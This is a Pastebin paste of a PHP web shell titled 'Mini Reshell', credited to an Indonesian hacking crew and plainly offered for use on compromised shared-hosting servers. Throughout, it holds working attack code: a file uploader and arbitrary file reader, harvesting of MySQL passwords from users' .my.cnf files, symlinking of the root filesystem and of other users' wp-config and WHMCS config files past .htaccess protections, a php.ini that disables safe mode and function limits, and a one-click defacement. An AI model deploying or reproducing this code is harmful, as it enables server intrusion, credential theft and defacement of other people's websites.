coi234

rs.php

May 30th, 2020
44
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 44.89 KB | None | 0 0
  1. <?php
  2.  
  3. /* Copyright : */
  4. /* Recoded By SiAnTaRUnIX */
  5. /* Sumedang Cyber Team */
  6. /* Newbie Galau */
  7. /* Gua Sunda Coeg */
  8. /* Sinkaroid X Kerupuk */
  9. /* Cpanel Author rEd X */
  10.  
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14. $gambar = "http://0x01.yn.lt/1531752236697.png"; //url gambar
  15. $nick = "coi"; //nick kamu
  16.  
  17.  
  18.  
  19. ?>
  20. <html>
  21. <head>
  22.  
  23. <? ///////////CSS////////// ?>
  24.  
  25. <style type="text/css">
  26. body {
  27. background:black; font-size:11px;
  28. font-family:Courier,Courier,Courier;
  29. color: white; }
  30. a {
  31. color:darkred;
  32. }
  33. a:hover {
  34. border-bottom:1px solid aqua;
  35. }
  36. #menu a {
  37. padding:4px 15px;
  38. margin:0;
  39. background:darkred;
  40. color:white;
  41. text-decoration:none;
  42. letter-spacing:2px;
  43. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  44. }
  45. #menu a:hover {
  46. padding:4px 15px;
  47. margin:0;
  48. background: grey;
  49. color:white;
  50. text-decoration:none;
  51. letter-spacing:2px;
  52. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  53. }
  54. textarea {
  55. width:600px;
  56. height:200px;
  57. background: black;
  58. border:1px solid darkred;
  59. color: darkgreen;
  60. }
  61. input[type=text] , input[type=file] , select {
  62. background:black;
  63. color:white;border: 1px solid darkred;
  64. padding:6px 6px 6px 6px;
  65. }
  66. input[type=submit] {
  67. background:#b70505;
  68. color:white;border: 1px solid #000;
  69. padding:6px 6px 6px 6px;
  70. }
  71. .subbtn:hover {
  72. background:#c0bfbf;
  73. color:#000000;
  74. }
  75.  
  76. td, th { font-size: 12pt; text-align: left; vertical-align: top; color: dodgerblue; }
  77. h1 { font-size: 16pt; text-align: center; }
  78. h1 a { color: #000000 !important; text-decoration: none; }
  79. p { text-align: center; font-size: 9pt; }
  80. p a { color: #666666 !important; }
  81. table { margin: 0 auto; border-collapse: collapse; border: 1px solid #ffffff; min-width: 400px; }
  82. th, td { padding: 5px 10px; }
  83. th { background: black; color: #ffffff; }
  84. td a { color: dodgerblue !important; text-decoration: none; }
  85. th img { position: relative; top: -3px; left: 2px; }
  86. td { border-bottom: 1px solid #cccccc; background: black; }
  87. tr.odd td { background: black; }
  88.  
  89. #lol a {
  90. padding:4px 15px;
  91. margin:0;
  92. background:darkgreen;
  93. color:white;
  94. text-decoration:none;
  95. letter-spacing:2px;
  96. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  97. }
  98. </style>
  99.  
  100. <? /////////TITLE//////// ?>
  101.  
  102. <title>
  103. --== <?php echo $nick; ?> Mini Reshell ==--</title>
  104. </head>
  105.  
  106. <? ////////MENU///////// ?>
  107.  
  108. <br><center><div id=menu>
  109. <a href=?beby=home>Home</a>
  110. <a href=?beby=config>Grabber</a>
  111. <a href=?beby=cpanel>Cpanel Finder</a>
  112. <a href=?beby=uploads>Uploader</a>
  113. <a href=?beby=domain>Domain</a>
  114. <a href=?beby=tools>Tools</a>
  115.  
  116. </div></center>
  117. <p>
  118. <center>
  119. <img src=<?php echo $gambar; ?> width=320 height=315/><br /></center><br><center><div id=menu>
  120. <a href=?beby=jumper>Jumping</a>
  121. <a href=?beby=reverse>Riverse IP</a>
  122. <a href=?beby=symlink>Symlink</a>
  123. <a href=?beby=info>Info Web</a>
  124. <a href=?beby=quotes>Itachi Quotes</a>
  125.  
  126. </div></center>
  127. <br><center>
  128.  
  129. <? ////////START///////// ?>
  130.  
  131. <?php
  132. //uname
  133. echo '<font color="white">';
  134. echo php_uname();
  135. echo '<br><font color="darkred">Path :</font>';
  136. echo getcwd();
  137. echo '</font>';
  138. //info web
  139. if(isset($_GET['beby']) && ($_GET['beby'] == 'info')){
  140. ?>
  141.  
  142.  
  143.  
  144. <br><br><font size="2pt" color="green">Get Info Website</font>
  145. <form action="?beby" method="GET">
  146. <input type="text" name="beby" value="beby@Codes#~: info"> <input type="submit" value="Cek >> ">
  147. </form>
  148.  
  149.  
  150.  
  151. <?php
  152. }
  153. //info codes
  154. if(isset($_GET['beby']) && ($_GET['beby'] == 'beby@Codes#~: info')){
  155. ?>
  156.  
  157. <form action="?path=<?php echo $path; ?>&amp;beby=" method="post">
  158.  
  159. <?php
  160. $verdad = php_uname('s') . php_uname('r');
  161. $link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . $verdad . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  162.  
  163.  
  164. echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Name </th><th style="background:darkred;color:white; border-left:1px solid white; text-align:center; "> Info </th></tr> ';
  165. ?>
  166.  
  167. <tr><td>IP</td>
  168. <td style='border-left:1px solid white;' > <?php echo $_SERVER['SERVER_ADDR']; ?></td></tr>
  169.  
  170. <tr><td>User</td>
  171. <td style='border-left:1px solid white;' > uid=<?php echo getmyuid(); ?> gid= <?php echo getmygid(); ?></td></tr>
  172.  
  173. <tr><td>Path</td>
  174. <td style='border-left:1px solid white;' > <?php echo getcwd(); ?></td></tr>
  175.  
  176. <tr><td>PHP Version</td>
  177. <td style='border-left:1px solid white;' > <?php echo phpversion(); ?> </td></tr>
  178.  
  179. <tr><td>Server</td>
  180. <td style='border-left:1px solid white;' ><? echo $_SERVER['SERVER_SOFTWARE']; ?> </td></tr>
  181.  
  182. <tr><td> System </td>
  183. <td style='border-left:1px solid white;' > [ <a href=<? echo $link; ?>'><? echo $verdad; ?></a> ] <?php echo php_uname('v'); ?></td></tr>
  184.  
  185.  
  186.  
  187. <?php
  188.  
  189. echo '<tr><td>';
  190. echo 'Safe Mode </td><td style="border-left:1px solid white;"> ';
  191. if (ini_get('safe_mode') == 0) {
  192. echo "<font color='red'>OFF</font>";
  193. } else {
  194. echo " <font color='green'>ON</font> ";
  195. }
  196.  
  197. echo '</td></tr>';
  198. echo '<tr><td style="border-left:1px solid white;">';
  199.  
  200. echo 'Magic Quotes </td><td style="border-left:1px solid white;"> ';
  201. if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  202. echo "<font color='red'>OFF</font>";
  203. } else {
  204. echo " <font color='green'>ON</font> ";
  205. }
  206. echo '</td></tr></table>';
  207.  
  208. ?>
  209.  
  210. <?php
  211. }
  212. //kosong kak
  213. elseif(isset($_GET['beby']) && ($_GET['beby'] == '')){
  214. ?>
  215.  
  216.  
  217.  
  218.  
  219.  
  220.  
  221.  
  222. <?php
  223. }
  224. //home
  225. if(isset($_GET['beby']) && ($_GET['beby'] == 'home')){
  226. ?>
  227.  
  228. <?php
  229.  
  230. echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Nama </th><th style="border-left:1px solid white;text-align:center;background:darkred;color:white;"> Disable </th></tr> ';
  231. echo '<tr><td>DisablePHP</td><td style="border-left:1px solid white;">';
  232. $disable_functions = @ini_get("disable_functions");
  233. echo "<font color='darkred'>";
  234. echo $disable_functions;
  235. echo "</font>";
  236. echo '</td></tr></table>';
  237. ?>
  238.  
  239.  
  240. <?php
  241. }
  242. //uploads
  243. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'uploads'))
  244. {
  245. echo"<br><br><form method=post enctype=multipart/form-data>";
  246. echo"<input type=file name=f><input name=k type=submit id=k value=Upload><br>";
  247. if($_POST["k"]==Upload)
  248. {
  249. if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  250. echo"<b>".$_FILES["f"]["name"];
  251. }else{
  252. echo"<b>Gagal upload";
  253. }
  254. }
  255. ?>
  256.  
  257. <?php
  258. }
  259. //cpanel auto crack
  260. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'cpanel')){
  261. @ini_set('display_errors',0);
  262. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  263. $ar0=explode($marqueurDebutLien, $text);
  264. $ar1=explode($marqueurFinLien, $ar0[$i]);
  265. return trim($ar1[0]);
  266. }
  267.  
  268. echo '<br><br>';
  269.  
  270. echo "<center>";
  271. $d0mains = @file('/etc/named.conf');
  272. $domains = scandir("/var/named");
  273.  
  274. if ($domains or $d0mains)
  275. {
  276. $domains = scandir("/var/named");
  277. if($domains) {
  278. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  279. $count=1;
  280. $dc = 0;
  281. $list = scandir("/var/named");
  282. foreach($list as $domain){
  283. if(strpos($domain,".db")){
  284. $domain = str_replace('.db','',$domain);
  285. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  286. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  287. $path = getcwd();
  288.  
  289. if (is_readable($dirz)) {
  290. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  291. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  292. $password=entre2v2($p,'password="','"');
  293. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'>Check Here</a></td></tr>";
  294. $dc++;
  295. }
  296.  
  297. }
  298. }
  299. echo '</table>';
  300. $total = $dc;
  301. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  302. echo '</center>';
  303. }else{
  304. $d0mains = @file('/etc/named.conf');
  305. if($d0mains) {
  306. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  307. $count=1;
  308. $dc = 0;
  309. $mck = array();
  310. foreach($d0mains as $d0main){
  311. if(@eregi('zone',$d0main)){
  312. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  313. flush();
  314. if(strlen(trim($domain[1][0])) >2){
  315. $mck[] = $domain[1][0];
  316. }
  317. }
  318. }
  319. $mck = array_unique($mck);
  320. $usr = array();
  321. $dmn = array();
  322. foreach($mck as $o) {
  323. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  324. $usr[] = $infos['name'];
  325. $dmn[] = $o;
  326. }
  327. array_multisort($usr,$dmn);
  328. $dt = file('/etc/passwd');
  329. $passwd = array();
  330. foreach($dt as $d) {
  331. $r = explode(':',$d);
  332. if(strpos($r[5],'home')) {
  333. $passwd[$r[0]] = $r[5];
  334. }
  335. }
  336. $l=0;
  337. $j=1;
  338. foreach($usr as $r) {
  339. $dirz = '/home/'.$r.'/.my.cnf';
  340. $path = getcwd();
  341. if (is_readable($dirz)) {
  342. copy($dirz, ''.$path.'/'.$r.'.txt');
  343. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  344. $password=entre2v2($p,'password="','"');
  345. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  346. $dc++;
  347. flush();
  348. $l=$l?0:1;
  349. $j++;
  350. }
  351. }
  352. }
  353. echo '</table>';
  354. $total = $dc;
  355. echo '<br><font color="green">Total cPanel Found = '.$total.'</font>';
  356. echo '</center>';
  357.  
  358. }
  359. }else{
  360. echo "<i><font color='green'>ERROR<br>/var/named or etc/named.conf Not Accessible! </font> </i>";
  361. }
  362. ?>
  363.  
  364. <?php
  365. }
  366. //jumping
  367. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'jumper')){
  368. echo '<center>';
  369. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><b><font color="green">Error: safe_mode = on</font></b> </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  370. <br><center>$nick Mini Reshell</center> ');
  371. set_time_limit(0);
  372. ###################
  373. @$passwd = fopen('/etc/passwd','r');
  374. if (!$passwd) { die('<br><b><font color="green">Error : coudn`t read /etc/passwd</font></b> </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By '.$nick.'</font></center><b>
  375. <br><center>'.$nick.' Mini Reshell</center> '); }
  376. $pub = array();
  377. $users = array();
  378. $conf = array();
  379. $i = 0;
  380. while(!feof($passwd))
  381. {
  382. $str = fgets($passwd);
  383. if ($i > 35)
  384. {
  385. $pos = strpos($str,':');
  386. $username = substr($str,0,$pos);
  387. $dirz = '/home/'.$username.'/public_html/';
  388. if (($username != ''))
  389. {
  390. if (is_readable($dirz))
  391. {
  392. array_push($users,$username);
  393. array_push($pub,$dirz);
  394. }
  395. }
  396. }
  397. $i++;
  398. }
  399.  
  400. ###################
  401. echo '<br>';
  402. echo "[+] Founded <font size=10 color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />";
  403. echo "[+] Founded <font color=red size=10> ".sizeof($pub)." </font> readable public_html directories\n"."<br />";
  404. echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  405. foreach ($users as $user)
  406. {
  407. $path = "/home/$user/public_html/";
  408. echo " <table><tr><td> ";
  409. echo "<font color=white>[Ok] <a href='?beby=exploler&path=$path'>$path</a></font><br>";
  410. echo " </td></tr></table> ";
  411. }
  412. echo "\n";
  413. echo '</center>';
  414. ?>
  415.  
  416. <?php
  417. }
  418. //get files jump
  419. elseif(isset($_GET['filesrc'])){
  420. echo "<br><br>Current File : ";
  421. echo $_GET['filesrc'];
  422. echo '<br /><br><table width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%"><tr><td style="background:darkred;color:white;"><b>Code &lt;/&gt;</b></td></tr><tr><td width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%" >';
  423.  
  424. ?>
  425.  
  426. <?php
  427. echo ' <font color="green"> ';
  428. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  429. echo ' </font> ';
  430. ?>
  431.  
  432. <?php
  433.  
  434. echo '</td></tr></table>';
  435. }
  436. //open directory
  437. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'exploler')){
  438. if(isset($_GET['path'])){
  439. $path = $_GET['path'];
  440. }else{
  441. $path = getcwd();
  442. }
  443. $path = str_replace('\\','/',$path);
  444. $paths = explode('/',$path);
  445. echo ' <br><br> <div id="lol"> <font color="darkred"> Current Path : </font><font color="green"> ';
  446. foreach($paths as $id=>$pat){
  447. if($pat == '' && $id == 0){
  448. $a = true;
  449. echo '<a href="?beby=exploler&path=/">Root</a>&nbsp;';
  450. continue;
  451. }
  452. if($pat == '') continue;
  453. echo '<a href="?beby=exploler&path=';
  454. for($i=0;$i<=$id;$i++){
  455. echo "$paths[$i]";
  456. if($i != $id) echo "/";
  457. }
  458. echo '">'.$pat.'</a>&nbsp;';
  459. }
  460. echo ' </font></div> ';
  461.  
  462. $path = getcwd();
  463. if(isset($_GET['path'])){
  464. $path = $_GET['path'];
  465. }else{
  466. $path = getcwd();
  467. }
  468. //scan directory
  469. $scandir = scandir($path);
  470. echo '<br><br><center><table class="bawah"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  471. <tr>
  472. <td style="background:darkred;color:white;"><center>Name</center></td>
  473. <td style="background:darkred;color:white; border-left:1px solid white;"><center>Permissions</center></td>
  474. </tr>';
  475. //for scan directory
  476. foreach($scandir as $dir){
  477. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  478. echo "<tr>
  479. <td> [DIR] <font color=\"dodgerblue\"> <a href=\"?beby=exploler&path=$path/$dir\">$dir</a></font></td>
  480. <td style='border-left:1px solid white;'><center>";
  481. if(is_writable("$path/$dir")) echo '<font color="green">';
  482. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  483. echo perms("$path/$dir");
  484. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  485.  
  486. echo "</center></td>
  487. </tr>";
  488. }
  489. echo '<br>';
  490. //for scan filelist
  491. foreach($scandir as $file){
  492. if(!is_file("$path/$file")) continue;
  493. $size = filesize("$path/$file")/1024;
  494. $size = round($size,3);
  495. if($size >= 1024){
  496. $size = round($size/1024,2).' MB';
  497. }else{
  498. $size = $size.' KB';
  499. }
  500. //mempersingkat nama file
  501. if (strlen($file) > 40) {
  502. $url = substr($file, 0, 35) . "...";
  503. } else {
  504. $url = $file;
  505. }
  506. //starting
  507. echo "<tr>
  508. <td> ★ <font color='dodgerblue'><a href=\"?beby=exploler&filesrc=$path/$file&path=$path\">$url</a></font></td><center><td style='border-left:1px solid white;'><center>";
  509. if(is_writable("$path/$file")) echo '<font color="#FF00FF">';
  510. elseif(!is_readable("$path/$file")) echo '<font color="FFE4E1">';
  511. echo perms("$path/$file");
  512. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  513. echo "</center></td></tr>";
  514.  
  515. }
  516. echo '</table>
  517. </center>';
  518. ?>
  519.  
  520. <?php
  521. }
  522. //empety tools
  523. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'empety')){
  524. ?>
  525.  
  526.  
  527.  
  528. :(
  529.  
  530.  
  531.  
  532. <?php
  533. }
  534. //symlink
  535. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'symlink')) {
  536. echo " <form action= method=post>";
  537. @set_time_limit(0);
  538. echo "<center>";
  539. @mkdir('sym',0777);
  540. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<br><br><font color='green'>Cant access this file on server -> [ /etc/named.conf ]</font></center>"; } else { echo "<table width='700' border='0' cellpadding='3' cellspacing='1' align='center'><td style='background:darkred;color:white;'>Domains</td><td style='background:darkred;color:white;'>Users</td><td style='background:darkred;color:white;'>Symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<font color=red>".$string[1][0].'</font>'; } echo " <tr> <td><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a> </td> <td style=border-left:1px solid white;> '.$UID['name']." </td> <td style=border-left:1px solid white;> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr>"; flush(); } } } } echo "</center></table>";
  541. }
  542. ?>
  543.  
  544. <?php
  545. //reverse IP lookup
  546. if(isset($_GET['beby']) && ($_GET['beby'] == 'reverse'))
  547. {
  548. ?>
  549. <br><br><br>
  550. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'> DNS Reverse IP </a></center>
  551. <br><br>
  552. <center><div id="sitelist"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal"><div id='menu'> Paypal On Server </a></center>
  553. <br><br>
  554. <center><div id="visa"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master"><div id='menu'> CC On Server </a></center>
  555.  
  556. <?php
  557. }
  558. //tools for you
  559. if(isset($_GET['beby']) && ($_GET['beby'] == 'tools'))
  560. {
  561. echo'<center><br><br>
  562. <tr><form method="post" action="">&nbsp;<td>
  563. <select name="pilihan" id="pilih">
  564. <option>-----------------=Select=-----------------</option>
  565. <option value="db">DataBase [Mysql Adminer]</option>
  566. <option value="forbid">Bypass Forbidden Symlink/Config [ .htaccess ]</option>
  567. <option value="auto">Deface! [bie.txt]</option>
  568. </select>
  569. <input type="submit" name="submites" value=" >> ">
  570. </td></form>';
  571. //starting
  572. error_reporting(0);
  573. set_time_limit(0);
  574. $submit = $_POST ['submites'];
  575. if(isset($submit)) {
  576. $pilih = $_POST['pilihan'];
  577. //auto deface
  578. if ( $pilih == 'auto') {
  579. $file = 'Hacked By '.$nick.'';
  580. $r=fopen("bie.txt", "w"); fwrite($r,$file); fclose($r);
  581. $to = "$email";
  582. $subject = "bie.txt";
  583. $header = "Script Deface";
  584. $message = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
  585. $message .= "Pass : ".$auth_pass." Path : " . __file__;
  586. $sentmail = @mail($to, $subject, $message, $header);
  587. echo "<script>alert('done! check bie.txt'); hideAll();</script>";
  588. echo "<p><center><font color=green>Check = >> <a href='bie.txt' target=_blank><b>bie.txt</b></a></font></center>
  589.  
  590.  
  591.  
  592. </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  593. <br><center>$nick Mini Reshell</center>
  594. ";
  595. die();
  596. }
  597. //for database mysql manager
  598. elseif ( $pilih == 'db') {
  599. $script = "";
  600. file_put_contents("db.php",base64_decode($script));
  601. echo "<script>alert('done! check db.php'); hideAll();</script>";
  602. echo "<p><center><font color=green>Check = >> <a href='db.php' target=_blank><b>db.php</b></a></font></center>
  603.  
  604.  
  605.  
  606. </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  607. <br><center>$nick Mini Reshell</center> ";
  608. die();
  609. }
  610. //create php.ini for safe mode
  611. elseif ( $pilih == 'phini') {
  612. $byht = "safe_mode = Off
  613. disable_functions = None
  614. safe_mode_gid = OFF
  615. open_basedir = OFF
  616. allow_url_fopen = On";
  617. file_put_contents("php.ini",$byht);
  618. echo "<script>alert('php.ini Created'); hideAll();</script>";
  619. die();
  620. }
  621. //forbiden
  622. elseif ( $pilih == 'forbid') {
  623. $hateaces = "AddHandler application/x-httpd-php4 .php .php4 .php3
  624. Options +FollowSymLinks +Indexes
  625. DirectoryIndex default.html
  626. AddType text/html php
  627. Options +ExecCGI
  628. AddHandler cgi-script cgi pl xt
  629.  
  630. AddHandler cgi-script cgi pl tg love h4 tgb cbg lta izo vic
  631.  
  632. DirectoryIndex Sux.html
  633. AddType text/plain .php
  634. AddHandler server-parsed .php
  635. AddType text/plain .html
  636. AddHandler txt .html
  637. Require None
  638. Satisfy Any";
  639. file_put_contents(".htaccess",$hateaces);
  640. echo "<script>alert('.htaccess Created'); hideAll();</script>";
  641. die();
  642. }
  643. }
  644. }
  645. ?>
  646.  
  647.  
  648.  
  649. <?php
  650. //itachi quotes
  651. if(isset($_GET['beby']) && ($_GET['beby'] == 'quotes')){
  652. ?>
  653.  
  654. <br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Itachi Quotes </th></tr><td>
  655. Kita Tidak Tahu Orang Seperti Apa Kita Sebenarnnya, Sampai Di Saat Detik-Detik Kematian Kita Tiba....<br>Saat Itulah Kita Akan Tahu Orang Seperti Apa Kita Sebenarnya !!
  656. </td></tr></table>
  657.  
  658.  
  659. <?php
  660. }
  661. //contfig grabber
  662. if(isset($_GET['beby']) && ($_GET['beby'] == 'config'))
  663. {
  664. ?>
  665. <form action="?beby=config" method="post">
  666. <br>
  667.  
  668. <form method=post><font color=white size=2 face="Tahoma">Create php.ini</font><p>
  669. <input type=submit name=ini value="use to Generate PHP.ini" /></p></form>
  670. <form method=post><font color=white size=2 face="Tahoma">Search Username</font><p>
  671. <input type=submit name="usre" value="use to Extract usernames" /></p></form>
  672.  
  673.  
  674. <?php
  675. //php.ini
  676. if(isset($_POST['ini']))
  677. {
  678. $r=fopen('php.ini','w');
  679. $rr="safe_mode=OFF
  680. disable_functions=NONE";
  681. fwrite($r,$rr);
  682. $link="<a href=php.ini><font color=white size=2 face=\"Tahoma\"><u>buka di newtab PHP.INI</u></font></a>";
  683. echo $link;
  684. }
  685. ?>
  686.  
  687.  
  688. <?php
  689. //user
  690. if(isset($_POST['usre'])){
  691. ?><form method=post>
  692.  
  693. <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
  694. foreach($users as $user)
  695. {
  696. $str=explode(":",$user);
  697. echo $str[0]."\n";
  698. }
  699. ?></textarea>
  700.  
  701. <br><br>
  702.  
  703. <input type=submit name=su value="Grabber Now !!" /></form>
  704.  
  705. <?php } ?>
  706.  
  707. <?php
  708. //config
  709. error_reporting(0);
  710. if(isset($_POST['su']))
  711. {
  712. mkdir('hkc',0777);
  713. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  714. $g = fopen('hkc/.htaccess','w');
  715. fwrite($g,$rr);
  716. $hkc = symlink("/","hkc/root");
  717. $rt="<a href=hkc/root><font color=white size=3 face=\"Tahoma\"> Boxed</font></a>";
  718. echo "See for folder symlink <br><u>$rt</u>";
  719. $dir=mkdir('hkc',0777);
  720. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  721. $f = fopen('hkc/.htaccess','w');
  722. fwrite($f,$r);
  723. $consym="<a href=hkc/><font color=white size=3 face=\"Tahoma\">Configuration files</font></a>";
  724. echo "<br>Result<br><u><font color=red size=2 face=\"Tahoma\">$consym</font></u>";
  725. $usr=explode("\n",$_POST['user']);
  726. $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
  727. foreach($usr as $uss )
  728. {
  729. $us=trim($uss);
  730. foreach($configuration as $c)
  731. {
  732. $rs="/home/".$us."/public_html/".$c;
  733. $r="hkc/".$us." .. ".$c;
  734. symlink($rs,$r);
  735. }
  736. }
  737. }
  738. }
  739. ?>
  740.  
  741.  
  742. <?php
  743. //domain viewer
  744. if(isset($_GET['beby']) && ($_GET['beby'] == 'domain'))
  745. {
  746. ?>
  747. <form action="?beby=domain" method="post">
  748. <?php
  749. //radable public_html
  750. echo "<br><br>";
  751. $file = @implode(@file("/etc/named.conf"));
  752. if(!$file){ die("<font color='green'># can't ReaD -> [ /etc/named.conf ] </font>
  753.  
  754. </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  755. <br><center>$nick Mini Reshell</center>
  756. "); }
  757. preg_match_all("#named/(.*?).db#",$file ,$r);
  758. $domains = array_unique($r[1]);
  759. function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  760. check();
  761. echo ' <center>
  762. [+] Here We Have : [<font style=color:#00FF00>".count($domains)."</font>] Listed Domains In localhost.</center>
  763. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><td style="background:darkred;color:white;text-align:center;"><b>List Of Users</b></td> <td style="background:darkred;color:white;text-align:center;border-left:1px solid white;"> <b><font style=color:#F80;List Of Domains</b></td></tr> ';
  764. foreach($domains as $domain)
  765. {
  766. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  767. echo "<tr><td><a href='http://www.$domain' target='_blank' style='color:#00FF00;'>$domain</a></td><td style='border-left:1px solid white;'>".$user['name']."</td></tr>";
  768. }
  769. echo "</table>";
  770. //redable public_html
  771. }
  772.  
  773. ?>
  774.  
  775.  
  776.  
